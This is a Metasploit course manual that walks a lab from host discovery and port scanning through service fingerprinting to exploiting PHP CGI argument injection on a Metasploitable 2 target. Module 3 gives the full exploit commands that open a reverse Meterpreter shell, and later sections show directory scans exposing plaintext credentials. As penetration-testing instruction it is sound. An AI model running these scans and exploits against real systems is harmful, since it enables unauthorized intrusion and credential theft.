Table of Contents
- Module 1: Introduction to Scanning with Metasploit
- Module 2: Port Scanning and Service Enumeration
- Module 3: Vulnerability Scanning and Exploitation Potential Assessment
- Module 4: Metasploit’s Vulnerability Database (MSF Vuln DB)
- Summary
This reference manual walks through a full network reconnaissance and exploitation-assessment workflow using the Metasploit Framework, from initial host discovery through port scanning, service enumeration, vulnerability identification, exploitation, and centralized results tracking with the Metasploit database. The lab environment used throughout is a Kali Linux attacking host on the 172.31.37.0/24 network, with a Metasploitable 2 target machine at 172.31.37.25.
flowchart LR
A[Reconnaissance<br/>Host Discovery] --> B[Port Scanning]
B --> C[Service Enumeration]
C --> D[Vulnerability Scanning]
D --> E[Exploitation]
E --> F[Results Tracking<br/>MSF Vuln DB]
F -.feeds back into.-> B
Module 1: Introduction to Scanning with Metasploit
The Metasploit Framework and Basic Command Workflow
The Metasploit Framework is a modular and versatile penetration testing platform that allows security professionals to exploit vulnerabilities, test systems, and gather information about target networks. It provides a powerful command-line interface that enables testers to run several types of scans, discovery tools, and exploitation modules to conduct a thorough penetration test.
At its core, Metasploit is built on a modular architecture. It organizes tools, exploits, and auxiliary modules into individual components that can be mixed and matched as needed. Whether you are scanning a target, attempting exploitation, or conducting post-exploitation activities, Metasploit has a module for every phase of a test.
The basic command structure of Metasploit follows a simple, repeatable syntax:
| Step | Command | Purpose |
|---|---|---|
| 1 | search <term> | Finds specific modules matching a keyword (e.g., a module type or protocol) |
| 2 | use <module path> | Loads the discovered module for execution |
| 3 | show options | Displays the configurable options for the loaded module (some required, some optional) |
| 4 | set <option> <value> | Sets a module’s variables, such as the target IP address or network range |
| 5 | run (or exploit) | Executes the selected module |
flowchart TD
S[search module_keyword] --> U[use module/path]
U --> O[show options]
O --> ST[set required/optional variables]
ST --> R[run / exploit]
R --> Res[Review results]
run and exploit are functionally interchangeable for executing a loaded module — exploit is the traditional term for exploit modules, while run works universally across auxiliary, scanner, and exploit modules alike.
Demo: Starting Metasploit and Module Syntax
Metasploit is launched from a Kali terminal using its interactive console:
msfconsole
Once the console loads, it displays the Metasploit banner and a command prompt where modules can be searched, loaded, and executed.
Step 1 — Search for a discovery module. To find a network discovery module such as an ARP sweep:
msf6 > search arp_sweep
This returns matching modules related to ARP-based network discovery.
Step 2 — Load the module.
msf6 > use auxiliary/scanner/discovery/arp_sweep
Once loaded, the console prompt changes to reflect the active module context.
Step 3 — View configurable options.
msf6 auxiliary(scanner/discovery/arp_sweep) > show options
Some variables are required and others are optional for a given module.
Step 4 — Set the target range and tuning options.
msf6 auxiliary(scanner/discovery/arp_sweep) > set rhosts 172.31.37.0/24
msf6 auxiliary(scanner/discovery/arp_sweep) > set threads 10
rhosts tells Metasploit which range of IP addresses to scan. threads defines how many threads the scan uses concurrently, which speeds up the process against larger networks.
Step 5 — Execute the scan.
msf6 auxiliary(scanner/discovery/arp_sweep) > run
This initiates the ARP sweep and returns a list of live hosts that responded to the ARP requests — establishing the initial map of hosts to investigate further.
sequenceDiagram
participant Analyst
participant MSF as Metasploit Console
participant Net as 172.31.37.0/24
Analyst->>MSF: search arp_sweep
MSF-->>Analyst: auxiliary/scanner/discovery/arp_sweep
Analyst->>MSF: use auxiliary/scanner/discovery/arp_sweep
Analyst->>MSF: set rhosts 172.31.37.0/24
Analyst->>MSF: set threads 10
Analyst->>MSF: run
MSF->>Net: ARP requests to each host
Net-->>MSF: ARP replies from live hosts
MSF-->>Analyst: List of live hosts
Active vs. Passive Reconnaissance
Reconnaissance techniques fall into two broad categories that set the stage for all subsequent scanning activity:
| Type | Description | Examples | Trade-off |
|---|---|---|---|
| Active reconnaissance | Directly interacts with target systems by sending requests or probes and analyzing the responses | Metasploit ARP sweep, ping sweep, port scans | Gives detailed insight into live systems and running services, but risks alerting defensive systems such as firewalls and intrusion detection systems |
| Passive reconnaissance | Gathers information from indirect sources without interacting with the target system | Public WHOIS databases, DNS records, file metadata analysis | More stealthy, but requires more effort and yields less information |
flowchart LR
subgraph Active Reconnaissance
A1[Sends packets/probes directly to target] --> A2[Detailed live-system data]
A2 --> A3[Risk: triggers IDS/firewall alerts]
end
subgraph Passive Reconnaissance
P1[Uses indirect public sources] --> P2[WHOIS / DNS / file metadata]
P2 --> P3[Stealthy but less detailed]
end
This course focuses on active reconnaissance techniques. Network discovery is an essential part of reconnaissance: it provides an overview of the network structure, including live hosts and active devices. Without network discovery, an assessor is effectively working blind when deciding which systems to target. The more accurate the map of the target network, the easier it becomes to identify entry points for exploitation. By running an ARP sweep or a ping sweep, live hosts can be identified quickly, which is critical for planning the next steps of a penetration test.
Demo: UDP Sweep and Scan
Beyond ARP sweeps, a UDP sweep is a critical part of any comprehensive reconnaissance effort. Many testers stick to TCP-only scanning and miss what is hiding “under the radar” — essential services like DNS and SNMP rely on UDP. Skipping UDP discovery leaves gaps in target analysis, so a UDP scan helps expose overlooked entry points and potential vulnerabilities.
Find and load the module:
msf6 > search udp_sweep
msf6 > use auxiliary/scanner/discovery/udp_sweep
Configure the scan:
msf6 auxiliary(scanner/discovery/udp_sweep) > set rhosts 172.31.37.0/24
msf6 auxiliary(scanner/discovery/udp_sweep) > set threads 10
The threads option controls the number of simultaneous scans, speeding up the process.
Execute:
msf6 auxiliary(scanner/discovery/udp_sweep) > run
The scan returns a list of hosts that respond to UDP requests — conceptually similar to the ARP sweep but capable of surfacing additional live hosts that ARP alone might miss. At this stage, the assessor has a unified, expanded list of live hosts on the network, providing the foundation for the next phase: scanning those hosts for open ports and discoverable services.
sequenceDiagram
participant Analyst
participant MSF as Metasploit Console
participant Net as 172.31.37.0/24
Analyst->>MSF: search udp_sweep
Analyst->>MSF: use auxiliary/scanner/discovery/udp_sweep
Analyst->>MSF: set rhosts 172.31.37.0/24
Analyst->>MSF: set threads 10
Analyst->>MSF: run
MSF->>Net: UDP probes (DNS, SNMP, etc.)
Net-->>MSF: UDP responses from live hosts
MSF-->>Analyst: Expanded list of live hosts
Module 2: Port Scanning and Service Enumeration
Understanding Port Scanning and Service Enumeration
Once live hosts have been identified, the next step is to gather more detailed information about those hosts — specifically, which ports are open and what services may be running. This process is known as port scanning and service enumeration.
Port scanning is essential because it reveals potential entry points into a target system. Open ports correspond to services running on that machine, such as a web server, an FTP server, or a remote access utility. Once those services are identified, the assessor can research known vulnerabilities that may exist within them.
Port scanning works by sending small packets to the target and waiting for a response:
- If the target replies, the port is open — worth probing further.
- If the target does not respond, the port is most likely closed, although it could also be filtered by a firewall.
flowchart TD
Probe[Send probe packet to port] --> Resp{Response received?}
Resp -->|Yes| Open[Port is Open — investigate the running service]
Resp -->|No| Filtered[Port is Closed or Filtered by a firewall]
Demo: TCP SYN Port Scanning
The demo begins with a TCP SYN scan against the Metasploitable 2 target at 172.31.37.25.
Find and select the scanner module:
msf6 > search portscan
Several port-scan modules are returned, depending on the scan technique. This walkthrough uses the auxiliary SYN scanner:
msf6 > use auxiliary/scanner/portscan/syn
Configure the target:
msf6 auxiliary(scanner/portscan/syn) > show options
msf6 auxiliary(scanner/portscan/syn) > set rhosts 172.31.37.25
msf6 auxiliary(scanner/portscan/syn) > set threads 10
msf6 auxiliary(scanner/portscan/syn) > show options
Note the option name is plural — rhosts, not rhost — for modules that can target either a single machine or a range of machines (this varies by module).
Execute the scan (default range is ports 1 through 10,000):
msf6 auxiliary(scanner/portscan/syn) > run
The scan returns a running list of open ports as it progresses, for example:
[+] 172.31.37.25:21 - TCP OPEN (FTP)
[+] 172.31.37.25:23 - TCP OPEN
[+] 172.31.37.25:25 - TCP OPEN
[+] 172.31.37.25:53 - TCP OPEN
[+] 172.31.37.25:512 - TCP OPEN
[+] 172.31.37.25:514 - TCP OPEN
Because scanning the full 1–10,000 range takes time, the scan can be interrupted and re-focused on a narrower range once a specific service is suspected. For example, to confirm whether MySQL is running:
msf6 auxiliary(scanner/portscan/syn) > set ports 3300-3400
msf6 auxiliary(scanner/portscan/syn) > run
[+] 172.31.37.25:3306 - TCP OPEN (MySQL)
This confirms MySQL is listening on its default port, 3306, and builds out a growing service profile of the target.
Demo: Service Enumeration
Before enumerating services, it is worth noting a subtle pitfall: if a scan’s delay option is left at 0 (zero milliseconds between connection attempts), some open ports can be missed because the target is not given enough time to respond consistently. Re-running the SYN scan with proper timing revealed additional open ports that had been missed the first time, including port 22 (SSH) and port 80 (HTTP).
Enumerating SSH (port 22):
msf6 > search ssh_version
A plain search ssh returns many unrelated modules; appending _version narrows the results to the exact fingerprinting module:
msf6 > use auxiliary/scanner/ssh/ssh_version
msf6 auxiliary(scanner/ssh/ssh_version) > show options
msf6 auxiliary(scanner/ssh/ssh_version) > set rhosts 172.31.37.25
msf6 auxiliary(scanner/ssh/ssh_version) > run
[+] 172.31.37.25:22 - SSH server version: SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1 (protocol 2.0)
The fingerprint shows the target is running OpenSSH 4.7p1 on Linux, using OpenBSD’s SSH implementation lineage. OpenSSH 4.7p1 is a notably old release, which immediately flags it as a candidate for further vulnerability research.
Enumerating HTTP (port 80):
msf6 > search http_version
msf6 > use auxiliary/scanner/http/http_version
msf6 auxiliary(scanner/http/http_version) > show options
msf6 auxiliary(scanner/http/http_version) > set rhosts 172.31.37.25
msf6 auxiliary(scanner/http/http_version) > run
[+] 172.31.37.25:80 - Apache/2.2.8 (Ubuntu) DAV/2 PHP/5.2.4-2ubuntu5.10 ...
The web server is running Apache 2.2.8 with PHP 5.2.4. Identifying exact service versions is what enables the next step: matching those versions against known, exploitable vulnerabilities.
| Service | Port | Fingerprinting Module | Result |
|---|---|---|---|
| FTP | 21 | (identified during SYN scan) | Open |
| Telnet | 23 | (identified during SYN scan) | Open |
| SMTP | 25 | (identified during SYN scan) | Open |
| DNS | 53 | (identified during SYN scan) | Open |
| SSH | 22 | auxiliary/scanner/ssh/ssh_version | OpenSSH 4.7p1 on Linux |
| HTTP | 80 | auxiliary/scanner/http/http_version | Apache 2.2.8, PHP 5.2.4 |
| MySQL | 3306 | auxiliary/scanner/portscan/syn (narrowed range) | Open |
sequenceDiagram
participant Analyst
participant MSF as Metasploit Console
participant Target as 172.31.37.25
Analyst->>MSF: use auxiliary/scanner/ssh/ssh_version
Analyst->>MSF: set rhosts 172.31.37.25
Analyst->>MSF: run
MSF->>Target: SSH banner grab
Target-->>MSF: SSH-2.0-OpenSSH_4.7p1
MSF-->>Analyst: OpenSSH 4.7p1 on Linux
Analyst->>MSF: use auxiliary/scanner/http/http_version
Analyst->>MSF: set rhosts 172.31.37.25
Analyst->>MSF: run
MSF->>Target: HTTP banner grab
Target-->>MSF: Apache/2.2.8 PHP/5.2.4
MSF-->>Analyst: Web server version identified
Module 3: Vulnerability Scanning and Exploitation Potential Assessment
Demo: Scanning for Known Vulnerabilities
With open ports and their exact service versions identified, the next step is to look for actual vulnerabilities — weaknesses in the running services and software that could range from unpatched security flaws to misconfigurations that leave the system exposed to attack.
Having previously fingerprinted the web server as Apache 2.2.8 with PHP 5.2.4, the next question is whether Metasploit has matching exploit modules. Rather than relying on search alone, the searchsploit utility (Exploit-DB’s offline search tool) can be used to identify candidate vulnerabilities first:
searchsploit apache 2.2.8 | grep php
This returns exploit entries that combine the Apache/PHP versions, though without a direct Metasploit module path. A further, more targeted search narrows down the specific vulnerable component:
searchsploit cgi | grep "php 5.4.2"
This surfaces a known vulnerability described as being of excellent exploit rank, corresponding to the Metasploit module:
multi/http/php_cgi_arg_injection
Load and use the module:
msf6 > use exploit/multi/http/php_cgi_arg_injection
Metasploit also allows referencing a module from a prior search results list directly by its index number instead of retyping the full path — e.g., use 1 for the first result in the most recent search listing.
Configure and run:
msf6 exploit(multi/http/php_cgi_arg_injection) > show options
msf6 exploit(multi/http/php_cgi_arg_injection) > set rhosts 172.31.37.25
msf6 exploit(multi/http/php_cgi_arg_injection) > set lhost 172.31.37.30
msf6 exploit(multi/http/php_cgi_arg_injection) > run
rhost is the target being attacked, and lhost is the listening host — the attacker’s own machine (the Kali box) that will receive the resulting shell connection. While lhost can sometimes be set to the loopback address 127.0.0.1, it is more reliable in practice to explicitly set it to the attacking machine’s actual IP address on the shared network.
Running the exploit successfully returns a Meterpreter session — an advanced, in-memory post-exploitation agent that provides interactive control of the compromised host. (Meterpreter usage itself, along with broader exploitation and post-exploitation techniques, extends beyond the scope of this reconnaissance-focused course and is covered separately.)
sequenceDiagram
participant Analyst
participant Shell as searchsploit (CLI)
participant MSF as Metasploit Console
participant Target as 172.31.37.25 (Apache 2.2.8 / PHP 5.2.4)
Analyst->>Shell: searchsploit apache 2.2.8 | grep php
Shell-->>Analyst: Candidate exploit entries
Analyst->>Shell: searchsploit cgi | grep "php 5.4.2"
Shell-->>Analyst: multi/http/php_cgi_arg_injection (Excellent rank)
Analyst->>MSF: use exploit/multi/http/php_cgi_arg_injection
Analyst->>MSF: set rhosts 172.31.37.25
Analyst->>MSF: set lhost 172.31.37.30
Analyst->>MSF: run
MSF->>Target: PHP CGI argument injection exploit
Target-->>MSF: Reverse connection established
MSF-->>Analyst: Meterpreter session opened
Demo: Scanning for Critical Files and Directories
Beyond exploiting a service directly, running a directory scanner against a web server can uncover directories that expose sensitive information.
Directory enumeration:
msf6 > search directory scanner
msf6 > use 0
msf6 auxiliary(scanner/http/dir_scanner) > show options
Since rhosts was already set from a prior module in the same session, the scan can be run immediately:
msf6 auxiliary(scanner/http/dir_scanner) > run
Example discovered directories:
[+] Found /cgi-bin/
[+] Found /doc/
[+] Found /icons/
[+] Found /index/
[+] Found /phpmyadmin/
[+] Found /test/
Checking robots.txt: Websites can specify, via a robots.txt file, which directory structures they do not want search engines to index — which paradoxically often reveals sensitive paths to an attacker.
msf6 > search robots.txt
msf6 > use 0
msf6 auxiliary(scanner/http/robots_txt) > show options
msf6 auxiliary(scanner/http/robots_txt) > run
The robots.txt scan reveals a directory named passwords inside a utility directory. Browsing directly to that path exposes a plaintext file containing credentials:
http://172.31.37.25/<utility-dir>/passwords
A further look at a discovered config.inc file reveals database connection details in cleartext:
host = localhost
user = root
password = (blank)
This walkthrough illustrates how information disclosure vulnerabilities — forgotten backup files, exposed configuration files, unrestricted directory listings — can leak credentials and internal architecture details without any active exploitation being required.
flowchart TD
A[auxiliary/scanner/http/dir_scanner] --> B[Discover /cgi-bin, /doc, /icons, /phpmyadmin, /test ...]
C[auxiliary/scanner/http/robots_txt] --> D[Discover disallowed path: /passwords]
D --> E[Browse directly to passwords file]
E --> F[Plaintext credentials exposed]
B --> G[config.inc discovered]
G --> H["host=localhost, user=root, password=blank"]
Module 4: Metasploit’s Vulnerability Database (MSF Vuln DB)
Demo: Using the MSF Vulnerability Database (Workspaces, db_nmap, and Global Variables)
One of the ongoing challenges of any penetration test is managing the sheer volume of data produced by multiple scans across multiple hosts. The Metasploit Framework Vulnerability Database solves this by providing a centralized place to store, organize, and reference scan results — including results imported from external tools such as Nmap, which has a direct integration into Metasploit.
Workspaces let an assessor organize data the way folders organize files. List existing workspaces:
msf6 > workspace
By default, only a default workspace exists. View available sub-commands:
msf6 > workspace -h
This reveals options to add, delete, list, and rename workspaces. Create a new workspace for a specific engagement:
msf6 > workspace -a gotham
msf6 > workspace
The newly created gotham workspace appears in the list with an asterisk marking it as the currently active workspace. Any scanner results — including imports from third-party tools — are now saved under this workspace.
Populating the workspace with an Nmap scan run directly through Metasploit’s database-integrated Nmap wrapper:
msf6 > db_nmap -sV -v 172.31.37.10-40
-sV performs version detection, and -v runs in verbose mode, scanning the specified IP range. Once complete, list the hosts now tracked by the database:
msf6 > hosts
This displays each discovered host’s MAC address, possible OS name, and other fingerprint data (some entries may show as “unknown” depending on how the target responds to OS-fingerprinting probes).
Deeper host fingerprinting can be performed with Nmap’s aggressive scan flag, which enables OS detection, version detection, Nmap scripting engine (NSE) checks, and traceroute all at once:
msf6 > db_nmap -A 172.31.37.10-40
msf6 > hosts
Re-running hosts afterward shows a considerably more complete picture of each tracked host.
Global variables avoid the repetitive need to re-type rhosts/lhost for every new module in an engagement focused on the same target(s). Use setg instead of set, and note that global option names must be capitalized:
msf6 > setg RHOSTS 172.31.37.25
msf6 > setg LHOST 172.31.37.30
RHOSTS is set to the specific target of interest for this workspace, while LHOST is set to the Kali attacking box, which remains constant across the engagement.
With globals set, loading a new module automatically inherits them:
msf6 > search portscan tcp
msf6 > use 4
msf6 auxiliary(scanner/portscan/syn) > show options
show options now displays rhosts already populated from the global variable — no manual set required.
Discovering what modules exist inside Metasploit can be done a few different ways beyond search/searchsploit:
msf6 > show auxiliary
msf6 > show exploits
msf6 > show payloads
show auxiliary lists roughly 1,255 auxiliary modules; show exploits lists nearly 2,500 exploit modules (for example, modules targeting RealVNC or VNC Viewer); and show payloads lists a wide range of reverse-shell and injection payloads.
Querying the database by host attributes: the hosts command supports column filtering and value filtering to narrow results, for example limiting the display to address and OS-flavor columns, filtered to Linux systems only:
msf6 > hosts -c address,os_flavor os_flavor:Linux
This same filtering mechanism can feed directly into a module’s rhosts option using the -R flag, which injects the matching host addresses straight into the currently loaded module:
msf6 auxiliary(scanner/portscan/syn) > hosts -c address os_flavor:Linux -R
msf6 auxiliary(scanner/portscan/syn) > run
This runs the scan against every host in the database matching the Linux filter simultaneously (in this example, two matching hosts) — overriding the earlier global default and confirmed by show options reflecting the newly injected rhosts value.
Other valuable database commands:
| Command | Purpose |
|---|---|
workspace | List or switch between workspaces |
workspace -a <name> | Create a new workspace |
db_nmap <flags> <range> | Run an Nmap scan with results stored directly in the active workspace |
hosts | List all hosts tracked in the current workspace’s database |
hosts -c <columns> <filter> | Filter tracked hosts by column and value (e.g., OS flavor) |
hosts -c address <filter> -R | Inject filtered host addresses into a loaded module’s rhosts option |
setg <OPTION> <value> | Set a global variable inherited by every subsequently loaded module |
vulns | List vulnerabilities detected across tracked hosts |
loot | List captured artifacts (e.g., password hash dumps) gathered during an engagement |
The vulns and loot commands are particularly valuable for after-the-fact review: it is common to run a scan, not immediately notice everything it captured, and later revisit vulns or loot to discover additional findings that were quietly stored in the background.
flowchart TD
W[workspace -a gotham] --> N[db_nmap -sV -v range]
N --> H[hosts]
H --> A[db_nmap -A range for deep fingerprinting]
A --> H2[hosts — richer data]
H2 --> G[setg RHOSTS / setg LHOST]
G --> M[Load module — rhosts pre-populated]
M --> F[hosts -c address os_flavor:Linux -R]
F --> R[run against filtered host set]
R --> V[vulns]
R --> L[loot]
mindmap
root((MSF Vuln DB))
Workspaces
Create / list / rename / delete
Isolates data per engagement
Nmap Integration
db_nmap -sV
db_nmap -A
Global Variables
setg RHOSTS
setg LHOST
Querying
hosts
hosts -c columns filter
hosts ... -R to inject into module
Module Inventory
show auxiliary (~1,255 modules)
show exploits (~2,500 modules)
show payloads
Findings Storage
vulns
loot
An important operational reminder underlying every demo in this course: only run these scanning and exploitation techniques against systems and networks you own or have explicit authorization to test. Unauthorized use of these tools can lead to serious legal consequences.
Summary
This course walked through the complete active-reconnaissance-to-assessment workflow using the Metasploit Framework:
- Framework fundamentals — every Metasploit module is driven by the same repeatable cycle:
search→use→show options→set→run/exploit. - Host discovery — ARP sweeps (
auxiliary/scanner/discovery/arp_sweep) and UDP sweeps (auxiliary/scanner/discovery/udp_sweep) identify live hosts on a network, forming the foundation for all later steps. Active reconnaissance techniques like these interact directly with targets and risk detection, in contrast to passive techniques that rely on indirect public sources. - Port scanning — a TCP SYN scan (
auxiliary/scanner/portscan/syn) reveals which ports are open on a given host, and can be tuned (viaports,threads, anddelay) to balance thoroughness against speed and reliability. - Service enumeration — version-fingerprinting modules such as
ssh_versionandhttp_versionidentify the exact software and version running behind each open port, which is the critical input for vulnerability research. - Vulnerability scanning and exploitation assessment — tools like
searchsploithelp match discovered service versions against known, ranked exploits; directory androbots.txtscanners can uncover exposed files, credentials, and configuration secrets without any exploitation at all. - The Metasploit database — workspaces,
db_nmap, global variables (setg), and host-filtered queries (hosts -c ... -R) turn scattered scan output into a centralized, queryable engagement record, withvulnsandlootpreserving findings for later review.
Quick-Reference Command Table
| Command | Description |
|---|---|
msfconsole | Launches the Metasploit interactive console |
search <term> | Finds modules matching a keyword |
use <path> or use <index> | Loads a module by path or by its index in the last search results |
show options | Displays a loaded module’s configurable variables |
set <option> <value> | Sets an option for the currently loaded module |
setg <OPTION> <value> | Sets a global option inherited by all subsequently loaded modules |
run / exploit | Executes the loaded module |
auxiliary/scanner/discovery/arp_sweep | ARP-based live host discovery |
auxiliary/scanner/discovery/udp_sweep | UDP-based live host discovery |
auxiliary/scanner/portscan/syn | TCP SYN port scan |
auxiliary/scanner/ssh/ssh_version | SSH service/version fingerprinting |
auxiliary/scanner/http/http_version | HTTP service/version fingerprinting |
auxiliary/scanner/http/dir_scanner | Web directory enumeration |
auxiliary/scanner/http/robots_txt | Retrieves and parses a target’s robots.txt |
exploit/multi/http/php_cgi_arg_injection | Exploits vulnerable Apache/PHP CGI argument handling |
searchsploit <term> | Offline Exploit-DB search from the shell |
workspace / workspace -a <name> | Lists / creates database workspaces |
db_nmap <flags> <range> | Runs Nmap with results stored in the active workspace’s database |
hosts / hosts -c <cols> <filter> | Lists / filters tracked hosts |
vulns | Lists detected vulnerabilities per host |
loot | Lists captured artifacts (e.g., credential dumps) |
Search Terms
scanning · reconnaissance · metasploit · systems · cybersecurity · networking · security · enumeration · port · service · vulnerability · command · database · msf